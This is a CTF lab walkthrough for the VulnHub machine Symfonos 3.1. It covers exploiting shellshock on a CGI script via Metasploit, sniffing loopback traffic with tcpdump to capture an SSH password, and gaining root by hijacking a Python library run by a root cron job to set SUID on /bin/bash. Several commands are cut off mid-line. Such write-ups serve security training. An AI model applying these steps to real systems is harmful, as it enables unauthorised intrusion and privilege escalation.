SYMFONOS: 3.1 Vuln Hub Machine Walkthrough

Symfonos 3.1 VulnHub

Intermediate real life based machine designed to test your skill at enumeration. If you get stuck, remember to try different wordlists, avoid rabbit holes and enumerate everything thoroughly.

Security Level: Intermediate

Penetrating Methodology:


1.    Network Scanning


2.    Scanning

  • NmapAutomator

3.    Enumeration

  • Web Directory Search(dirb)

4.    Exploitation

  • Msfconsole
  • SSH

5.    Privilege Escalation

  • Exploiting /bin/bash

Network Scanning:

We downloaded, imported and ran the virtual machine (.ova file) on the virtualbox, the machine will automatically be assigned an IP address from the network DHCP. To begin we will find the IP address of our target machine, for that use the following command as it helps to see all the IP’s in an internal network.

Commands: sudo arp-scan –l

Symfonos 3.1 Vuln Hub


We found the target’s IP Address The next step is to scan the target machine by using the NmapAutomator tool. This is to find the open ports and services.

Symfonos3.1 Vuln Hub


As we can see port 80 is open, we opened the IP address in our browser and some scary image got displayed.Then we looked for the page source, there was one question written in green colour saying can you bust the underworld? Which we thought might be some hint to look for some directory may be named underworld

Symfonos 3.1 VulnHub

It was time to use dirb for directory enumeration to look for some useful directories. We got one directory named /cgi-bin/.

Command: dirb

Symfonos 3.1 VulnHub

Now we are bust the underworld .We accessed the URL in the browser directorie

/cgi-bin/underworld/ and got a webpage displaying information like time, users and load average. I think This is probably shellshock vulnerability

Symfonos 3.1 VulnHub


The CGI (Common Gateway Interface) defines a way for a web server to interact with external content-generating programs, which are often referred to as CGI programs or CGI scripts.

We looked on google to look for any vulnerabilities present in the CGI and found that there is a critical vulnerability: shellshock remote command injection, which allows attackers to execute arbitrary code via the Unix Bash shell remotely.When we search in metasploit shellshock there is a exploit available for this vulnerability.

exploit/multi/http/apache_mod_cgi_bash_enc_exec set rhost

set lhost

set targeturi /cgi-bin/underworld run

Symfonos 3.1 VulnHub

First establish your shell using this command:python -c ‘import pty;pty.spawn(“/bin/bash”)’

We checked for sudo, suid, writable permissions for this user but all in vain. Since tcpdump was installed on the target system, we are using some commands to get users and passwords. Through the tcp dump but these commands run /tmp directory.

Commands: cd /tmp

tcpdump -D tcpdump -i lo

Symfonos 3.1 VulnHub



Symfonos 3.1 VulnHub

We got one username hades and password PTpZTfU4vxgzvRBE after that try login to SSh

Privilege Escalation:

We thought of trying pspy64 script which is a little command-line script which basically monitors scheduled Linux processes. So we export through the local server then pspy64 script into the /tmp directory of the target system and give it execution permissions before running it.

Commands: cd /tmp

wget chmod +x pspy64


Symfonos 3.1 VulnHub

After executing the script,We looked for the writable directories for this user and got one directory named /opt/ftpclient.In this directory we have two files and statuscheck.txt . When we check the content of there is ftplib

After that find and check the response if we are using the path check permissions. So we have root permissions.

Commands: cd /opt/ftpclient


find / -name “” 2>/dev/null ls -la /usr/lib/python2.7/


Symfonos 3.1 VulnHub

Now modify this file content give the os to permissions through the chmod for changing use of the nano text editor.

Command: nano /usr/lib/python2.7/

import os import sys

os.system(“chmod 4755 /bin/bash”)

Symfonos 3.1 VulnHub

Now execute your script if it does not work check the permissions. Remember this thing when you execute command /bin/bash starting with space. We got the root shell of the target system and eventually got the root flag.

Commands: ls -la /bin/bash

/bin/bash -p whoami

cd /root

cat proof.txt

Symfonos 3.1 VulnHub


Written By

Name : Akash Kumar


About Author

Leave a Reply

Your email address will not be published. Required fields are marked *

Open chat
Can we help you?